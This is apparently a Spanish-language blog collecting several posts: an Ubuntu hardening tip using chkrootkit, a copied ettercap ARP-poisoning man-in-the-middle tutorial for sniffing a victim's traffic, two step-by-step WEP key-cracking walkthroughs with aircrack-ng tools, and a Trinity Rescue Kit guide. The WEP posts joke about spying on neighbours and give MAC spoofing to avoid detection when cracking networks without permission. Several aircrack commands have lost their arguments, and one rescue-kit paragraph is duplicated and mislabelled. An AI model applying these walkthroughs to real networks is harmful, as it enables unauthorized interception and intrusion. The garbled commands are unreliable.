viernes, 26 de marzo de 2010

Protegiendo Ubuntu linux.

Muchos usuarios que por lo general acaban de instalar su primera distro de linux, y no solo ellos muchas veces hasta a los usuarios mas experimentados les pasa que dejan la configuracion que trae por default su sistema linux recien instalado. Pues quiero decirle que estan propensos a ser atacados, muchos pensaran tal ves que para que alguien quiere atacar mi equipo lleno de porno e imagenes de chicas guapas.
Cuidado esto es lo que los crakers quieren que pienses para asi poder utilizar tu equipo como una mas en un enorme ejercito de maquinas comprometidas por los crakers para lanzar ataques DDoS, o para colgar algun sitio ftp de tu equipo y difundir software ilegal, es mas tambien pueden tener su propio sitio web en tu equipo cosas como esta son posibles gracias a las puertas traseras, exploits, sniffers, worms, troyanos, si es cierto, linux es casi inmune a los virus y digo casi por que existen casos de estudio en donde se crearon virus de prueba para atacar sistemas linux que por cierto hasta ahora han sido un fracaso parcial.

Bien dejemonos de sermoneo, y vamos a lo bueno.
para proteger sus sistemas linux de los exploits hay que mantener actualizados sus programas, para protegerlos de ataque remotos utilicemos el tan eficiente firewall incluido en el propio nucleo linux, las iptables, y para troyanos, gusanos, puertas traseras, etc existe un software de escaneo de rootkits que es muy eficiente yo lo uso actualmente y en la pagina oficial del proyecto se encuentran mas detalles de dicho software.

descarga

ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz

pagina oficial

http://www.chkrootkit.org

pueden descargar el paquete, directamente del sitio oficial o instalarlo desde la consola, esto, solo para las distribuciones basadas en Debian.

instalacion

$ sudo apt-get install chkrootkit

ejecucion

$ sudo chkrootkit

espero que les sirva esta informacion, no es pirateada yo mismo uso dicho software y si quieren saber un poco mas sobre seguridad investiguen sobre lo que anteriormente se menciona. saludos.

domingo, 4 de octubre de 2009

Ataque man in the middle con ettercap...

Probando en: Ubuntu9.04

¿Funciona ésto en Windows?: Recomiendo trabajar sobre Linux.
Bueno, probablemente muchos ya conoscan Wireshark, uno de los analizadores de protocolos más famosos con el cual podemos “analizar” el tráfico que se genera en nuestra red. Pero… muchos tal vez han querido probarlo en redes switcheados, lo dejan corriendo y al regresar se dan cuenta de que solo han capturado un monton de paquetes Broadcast. Pues bien, la razón de ésto es que en una red switcheada la comunicación en la red tiene que pasar por el switch (o router) a diferencia de en la redes donde antes había hubs.

¿Entonces es imposible capturar tráfico de una red así?
No, la verdad es que solo hay que agregar unos pasos más a solo abrir el Wireshark y empezar a analizar protocolos, necesitamos realizar un ataque MitM para que el tráfico pase a través de nuestra máquina y de ahí ya podamos analizarlo.
Ah si, y no importa si estás conectado por cable o inalámbrico, el concepto en si es el mismo.
Ok, esto suena bien para un administrador y suena mucho mejor para un atacante, así que empecemos a platicar sobre el tema y veamos si llegamos a alguna conclusión interesante.
Bueno, primero definamos algunos conceptos con definiciones Wikipedia :) así me ahorraré algo de trabajo jeje. Lo que buscamos es ir uniendo términos, para que no solo hagamos el ataque a la copy-paste o click por aqui y por allá si no que sepamso realmente lo que está pasando.

¿Qué es un ataque Man-in-the-Middle?

Un ataque man-in-the-middle (MitM o intermediario, en castellano) es un ataque en el que el enemigo adquiere la capacidad de leer, insertar y modificar a voluntad, los mensajes entre dos partes sin que ninguna de ellas conozca que el enlace entre ellos ha sido violado. El atacante debe ser capaz de observar e interceptar mensajes entre las dos víctimas.

¿Qué es ARP?

ARP son las siglas en inglés de Address Resolution Protocol (Protocolo de resolución de direcciones).Es un protocolo de nivel de red responsable de encontrar la dirección hardware (Ethernet MAC) que corresponde a una determinada dirección IP. Para ello se envía un paquete (ARP request) a la dirección de difusión de la red (broadcast (MAC = ff ff ff ff ff ff)) que contiene la dirección IP por la que se pregunta, y se espera a que esa máquina (u otra) responda (ARP reply) con la dirección Ethernet que le corresponde.
Cada máquina mantiene una caché con las direcciones traducidas para reducir el retardo y la carga. ARP permite a la dirección de Internet ser independiente de la dirección Ethernet, pero esto sólo funciona si todas las máquinas lo soportan.ARP está documentado en el RFC (Request For Comments) 826.El protocolo RARP realiza la operación inversa.
En Ethernet, la capa de enlace trabaja con direcciones físicas. El protocolo ARP se encarga de traducir las direcciones IP a direcciones MAC (direcciones físicas).Para realizar ésta conversión, el nivel de enlace utiliza las tablas ARP, cada interfaz tiene tanto una dirección IP como una dirección física MAC.

¿Qué es ARP Poisoning?

El ARP Spoofing, también conocido como ARP Poisoning o ARP Poison Routing, es una técnica usada para infiltrarse en una red Ethernet conmutada (basada en switch y no en hubs), que puede permitir al atacante husmear paquetes de datos en la LAN (red de área local), modificar el tráfico, o incluso detener el tráfico (conocido como DoS: Denegación de Servicio).
El principio del ARP Spoofing es enviar mensajes ARP falsos (falsificados, o spoofed) a la Ethernet. Normalmente la finalidad es asociar la dirección MAC del atacante con la dirección IP de otro nodo (el nodo atacado), como por ejemplo la puerta de enlace predeterminada (gateway). Cualquier tráfico dirigido a la dirección IP de ese nodo, será erróneamente enviado al atacante, en lugar de a su destino real.
El atacante, puede entonces elegir, entre reenviar el tráfico a la puerta de enlace predeterminada real (ataque pasivo o escucha), o modificar los datos antes de reenviarlos (ataque activo). El atacante puede incluso lanzar un ataque de tipo DoS (Denegación de Servicio) contra una víctima, asociando una dirección MAC inexistente con la dirección IP de la puerta de enlace predeterminada de la víctima.EL ataque de ARP Spoofing puede ser ejecutado desde una máquina controlada (el atacante ha conseguido previamente hacerse con el control de la misma: intrusión), un Jack Box, o bien la máquina del atacante está conectada directamente a la LAN Ethernet.

SWITCH <——— > Atacante <——- > Víctima

Bueno, ¿y la víctima se dará cuenta?

No, realmente no saben que están siendo snifeados. Pero, si revisan los cachés arp de las máquinas podrían ver si hay dos hosts con la misma dirección MAC y pues ahí si se dan cuenta de que algo raro pasa :O
Tiene lógica entonces… lo que haremos será envenenar las tablas ARP … para esto crearemos paquetes que mandaremos a la víctima y esperaremos que ésta modificque su tabla. Pero, entonces necesitaremos trabajar con un sniffer (proceso para analizar el tráfico en una red) activo y aquí es donde entra ettercap.
OJO! Vamos a generar tráfico con esto, por lo que un administrador de red despierto podría notar que algo “raro” pasa. De hecho a resumidas cuentas, la magia radica en que Ettercap generará muchos mensajes ARP (de ahí que se genera tanto tráfico, nada es gratis) con la idea de que lleguen antes que los del switch.

Paso 1. Instalación de Ettercap y Wireshark

Si no está en nuestros repositorios ir a: http://ettercap.sourceforge.net/
En nuestro caso, estamos en Ubuntu y la versión más reciente de Ettercap está en los repositorios, si queremos la interfaz visual hacemos:
# sudo aptitude install ettercap-gtk
Mmmm… también wireshark está en los repositorios… asi que no tiene caso seguir en este paso jeje.
Aah, pero no olvidemos habilitar el envío de paquetes, para que si nos llegan paquetes que no estén destinados a nosotros, los envie de todas formas, osea que trabaje como ruteador (buscamos no detener el flujo de datos):
# echo 1 > /proc/sys/net/ipv4/ip_forward

Paso 2. Trabajando con Ettercap

Bueno, para empezar el Sniffing nos vamos al menu Sniff > Unified sniffing … y seleccionamos la interfaz de red que queremos poner en modo monitor (la que quiere captar el tráfico).






Ok… una vez hecho ésto vemos que nuestro menú cambia y nos da más opciones, recomiendo ir preparando el terreno para que tengamos un panorama amplio de lo que se está capturando de tráfico.
Menús que vamos a activar:
Hosts > Host lists
View > Connections
View > Profiles
View > Statistics

Bueno, ya una vez que tengamos preparada la mesa, pues empezamos a hacer el Sniffing, para ésto nos vamos al menú: Start > Start Sniffing
Bueno… ahorita solo estamos capturando Broadcast y el tráfico que nosotros generamos (por decir si navegamos por Internet, etc). Lo cual está bien, pues estamos viendo que máquinas hay en la red, si quieres acelerar el proceso, puedes aventar un Ping Sweep con Nmap o abrir el Angry IP Scanner y barrer toda la red. De hecho, el mismo Ettercap cuenta con una opción para escanear hosts en el menú: Hosts > Scan for Hosts.

Ejemplo con Nmap:

# nmap -sP 192.168.1.0/24

En la pantalla del Ettercap checamos que tenemos en los perfiles:



Esas son las máquinas que nos interesan, les explico que hay en mi red:
192.168.1.254 > Un modem de Infinitum, con el que me conecto a Internet (2wire)
192.168.1.64 > Mi máquina conectada a la wireless
192.168.1.68 > La máquina de prueba (víctima)
Ok, ahora hay que planear quien será la máquina víctima… en nuestro caso será 192.168.1.68 y el otro target será el modem (router, switch, como le quieran llamar, que aunque en teoría no es lo mismo para un fin práctico aceleramos proceso).
Bueno, ahora pasemos a la magia del ataque.

Paso 3. ARP Poisoning

Ok … vamos bien… ya tenemos poblada nuestra lista de Profiles, ahora en esa misma ventana damos click en Convert to Host List para poblar nuestra pestaña de Host List. En Host List podemos ver las direcciones IP + MAC Address (la teoría cobra sentido, no?).



Bueno, pues elegimos a nuestra víctima como Target 1 (mi caso 192.168.1.68) y como Target 2 el router (192.168.1.254). Ahora solo basta con ir al menú Mitm> ARP Poisoning y seleccionamos la primera opción: Sniff Remote Connections. Damos un vistazo a la pestaña de Connections y nos damos cuenta que ya estamos capturando tráfico de la máquina víctima :)
Bueno, pero en lo personal no me gusta cómo se muestra el tráfico en Ettercap (aunque vaya, es como una navaja suiza, dense oportunidad de checar todas las opciones con las que cuenta) así que utilizaremos en vez para analizar el tráfico al buen Wireshark. Ojo! No cerramos Ettercap y corremos Wireshark como root (también Ettercap debe estar corriendo como root).

Paso 4. Analizando con Wireshark

Bueno, abrimos Wireshark, vamos al menú: Capture > Interfaces

 

 Pero… bueno, a mi gusto no es tan interesante a veces capturar TOOOODO, así que en esa parte donde elegimos la interfaz, nos vamos a Options y daremos el siguiente filtro para solo tomar TCP que es lo que por lo general nos interesa mas… le damos en Start. Otro buen filtro podría ser “tcp port http”.

 

ES TODO

ANEXO LA INSTALACION DE ETTERCAP Y WIRESHARK

# apt-get install ettercap-gtk
# apt-get install wireshark

PARA EJECUTARLOS COMO ROOT

$ sudo ettercap -G
$ sudo wireshark

ACLARO QUE EL TEXTO NO LO ESCRIBI YO PERO YA LO PROBE Y FUNCIONA ES POR ESO QUE DECIDI SOLO COPIARLO TAL VES LO DEPURE EN ALGUN MOMENTO PERO NO HOY ESTOY REALMENTE CANSADO ESPERO LES SIRVA Y EN EL TITULO LES DEJO EL ENLACE AL POST ORIGINAL.





viernes, 2 de octubre de 2009

OBTENER CLAVES WEP EN MENOS DE 2 MINUTOS.

Por si quieren espiar a sus vecinos jajajaja no es cierto es una buena distro para auditorias wireless pero lo mejor es que trae soporte para atheros cuenta con las sutite aircrack-ng algunos sniffers, y otras cosillas mas, les dejo el link de deskarga de la pagina no se los pongo en partes por que ya ven la rapidez de los servers free user jajaj aki sta el link. obten claves en menos de 2 minutos (WEP).






link directo


EXPLICACION

1.- VERIFICAR INTERFACE WIRELESS

# iwconfig

suponiendo que es wlan0 utilizaremos esta interface.

2.- CAMBIAMOS DIRECCION MAC PARA NO SER DESCUBIERTOS (SI ES QUE LO ESTAN HACIENDO SIN PERMISO, NO DEBIERA SER ASI PERO DICEN QUE LO PROHIBIDO ES LO MAS RICO JAJAJA)

# macchanger -m 00:11:22:33:44:55 wlan0

3.- PONEMOS LA TARJETA EN MODO MONITOR

# iwconfig wlan0 mode monitor

4.- ESCANEO DE REDES...

# airodump-ng wlan0

5.- ESPERAMOS A QUE APAREZCA EL BSSID DE NUESTRO OBJETIVO.

BSSID = 00:11:22:33:44:55

DIRECCION MAC DEL ACCESPOINT A AUDITAR

6.- UTILIZAMOS EL BSSID DEL OBJETIVO CON UNA HERRAMIENTA BASTANTE PODEROSA Y NUEVA DE WIFIWAY.

# wesside-ng -v 00:11:22:33:44:55 -i wlan0

SOLO ESPERAMOS UN MINUTO Y LISTO...

CUALQUIER MAL USO DE ESTE PROGRAMA ES BAJO SU RESPONSABILIDAD... USENLO PARA BIEN...

viernes, 25 de septiembre de 2009

Trinity Rescue Kit

NAVEGANDO POR INTERNET ENCONTRE ESTE ARTICULO EN UN BLOG ESPERO LES SIRVA ACLARO NO ES MIO ACA LES DEJO EL ENLACE AL BLOG ORIGINAL Y UN LINK DE DESCARGA DE LA DISTRO.



Trinity Rescue Kit (TRK) es una distribución libre de Linux creada específicamente para recuperar y reparar equipos con Windows. Algunas de sus características más importantes son las siguientes:
  • 5 antivirus distintos que se ejecutan con un mismo comando y se actualizan a través de Internet:
    • ClamAV (clam).
    • F-prot (fprot).
    • Grisoft AVG (avg).
    • Bitdefender (bde).
    • Vexira (va).
  • Fácil eliminación de las contraseñas de Windows.
  • Clonación de sistemas de archivos NTFS a través de la red.
  • Utilidades y procedimientos para la recuperación de archivos borrados.
  • Recuperación de particiones perdidas.
  • Utilidad de clonación multicast de cualquier sistema de archivos.
  • 2 utilidades de detección de RootKits.
A continuación vamos a explicar cómo arrancar el TRK y poner el teclado en español y escanear en busca de virus.

Arranque del TRK

  1. Descargamos la imagen ISO desde la página oficial de Trinity Rescue Disk en Trinityhome.org.
    Aunque ahora mismo la versión 3.3 esté en Release Candidate 1 es la recomendada para descargar.
  2. Arrancamos el equipo con el TRK y nos aparece el Grub para seleccionar el tipo de arranque. En 10 segundos arranca la opción por defecto que es la que vamos a usar. 
Después configuramos el teclado en español y así podemos escribir sin problemas todos los símbolos. Lo hacemos ejecutando el siguiente comando: 

loadkeys es

Antivirus

Para escanear nuestro sistema en busca de virus disponemos de un script que nos facilita mucho la tarea y nos permite usar con el mismo comando con cualquiera de los cinco antivirus que dispone la versión 3.3. La estructura del comando con las opciones más importantes es la siguiente:

virusscan -a {clam,avg,fprot,bde,va} -d {destino}

a: indica el antivirus que se va a usar. Se puede poner más de uno separado por comas para ejecutarlos secuencialmente. Si no se indica esta opción, se escanea con ClamAV.
-d: directorio que se va a escanear.
Este script (virusscan) monta automáticamente todas las particiones disponibles por lo que no tenemos que preocuparnos de ejecutar mount.
Ejemplos:
  • Descarga el antivirus AVG y escanea todos los sistemas de archivos: 
virusscan -a avg

Como se puede ver en la imagen, es capaz de montar la partición de Windows aunque el sistema no se cerró correctamente. ¡Impresionante!

Descarga el antivirus AVG y escanea los directorios Windows y Archivos de programa montados en hda1:

virusscan -a bde -d /hda1/WINDOWS,/hda1/Archivos\ de\ programa


Como se puede ver en la imagen, es capaz de montar la partición de Windows aunque el sistema no se cerró correctamente. ¡Impresionante!

Descarga el antivirus AVG y escanea los directorios Windows y Archivos de programa montados en hda1:

virusscan -a bde -d /hda1/WINDOWS,/hda1/Archivos\ de\ programa

Descarga todos los antivirus y escanea todos los sistemas de archivos con cada uno de ellos:

virusscan -a clam,fprot,avg,bde,va 
 
 
 








Obtener clave wep con tuquito 3

Bien empecemos, por peticion de los hermanos bakunos explicare el proceso por el cual e obtenido claves wep, aclarando que solo es con fines educativos propiamente espero no lo usen para hacer maldad, bien una vez obtenida una copia de tuquito 3 o cualquier distro de linux siempre y cuando no tengas problemas con tu tarjeta de red, fijense que curioso las distros que fueron exclusivamente creadas para este fin muchas veces no funcionan y hay que estar descargando una nueva version que tenga soposte para nuestra tarjeta de red.

una vez que su tarjeta de red funciona a la perfeccion proseguimos, este metodo es valido para casi cualquier distro es mas probable que funcione en las que se basan en Debian.

1. instalamos aircrack-ng con un simple comando

$ sudo apt-get install aircrack-ng

averiguamos cual es el nombre de la interface puede variar, con el comando iwconfig
en mi caso es wlan0 tambien hay que anotar nuestra macaddress por si no les funciona el macchanger
ahora detenemos la interface de red con el comando:

# airmon-ng stop wlan0

mandara un mensaje de monitor mode disabled todo esta bien, ahora bajamos interfaces con:

# ifconfig wlan0 down

este comando por lo general no arojara mensaje alguno

cambiamos nuestra macadress con:

# macchanger --mac 00:11:22:33:44:55 wlan0

en caso de no tener este comando o que no funcione es por que tu tarjeta no es compatible pero no hay ningun problema podemos continuar con el proceso, solo como pequeño dato a tomar en cuenta, solo utilicen redes que tengan proteccion wep por que son las mas faciles de desencriptar y aparte te das cuenta de que la persona que es dueña de esta red y sin ofender no sabe mucho sobre como proteger su red por el contrario si encuentras una red super protegida con otro metodo mejor ni la toques por que puede ser que esten corriendo un autoscan y te detecten o peor aun clonen tu disco duro o dañen tu equipo esa es mi recomendacion si no tienes mucha experiencia en esto de la auditoria, bueno continuamos.

activamos el modo monitor de la tarjeta.

# airmon-ng start wlan0

nos lanzara una serie de comandos y hasta el ultimo aparecera un mensaje importante que dice monitor mode enabled on mon0. De qui en adelante utilizaremos la interface mon0.

comienza lo bueno empezamos a escanear las redes con.

# airodump-ng mon0

una vez que obtenemos los datos de la red que queremos auditar presionamos ctrl+c para detener el proceso y copiamos los siguientes datos.

el canal CH 1, 11, 6, etc el que aparezca
BSSID que es la mac del modem
ESSID que es el nombre del modem o la red o el router como le quieran decir dejemoslo en nombre de la conexion

con los datos obtenidos escribimos lo siguiente

# airodump-ng -c -w testprueba --bssid mon0

al poner los datos concretos no se ponen los simbolos mayor y menor que, testprueba es el archivo en donde se almacenaran datos prioritarios para aircrack puede llevar cualquier nombre solo recuerdelo por que se va a utilizar, abra una nueva terminal y escriba lo siguiente.

# aireplay-ng -1 0 -a -h -e mon0

saldran unos mensajes  pero debe salir un simbolo o carita como :-) si sale hasta aca vamos bien. Escriba lo siguiente

# aireplay-ng -3 -b -h mon0

esto comenzara la inyeccion de paquetes para celerar el proceso solo basta esperar, maximizamos la primera terminal recuerde que llevamos 2 terminales abiertas abrimos la primera que es la que esta capturando los paquetes, observe la parte que dice #Data espere a que por lo menos llegue a 15000 y abrimos otra terminal esta seria la tercera, y escribimos lo siguiente y ultimo este comando revelara la clave como por arte de magia suerte.

recuerde que mientras esten transitando muchos datos por la red sera mas facil.

# aircrack-ng -n 64 -b testprueba<-01.cap esto es asignado automaticamente pero el archivo es un .cap>

bien al finalizar aparece un mensaje que dice

KEY FOUND! [49:23:45:66:77]

LE QUITAN LOS 2 PUNTOS Y LA CLAVE ES: 4923456677

ES TODO ¡SUERTE!

PROCESO REALIZADO EN TUQUITO3 CON CHIP ATHEROS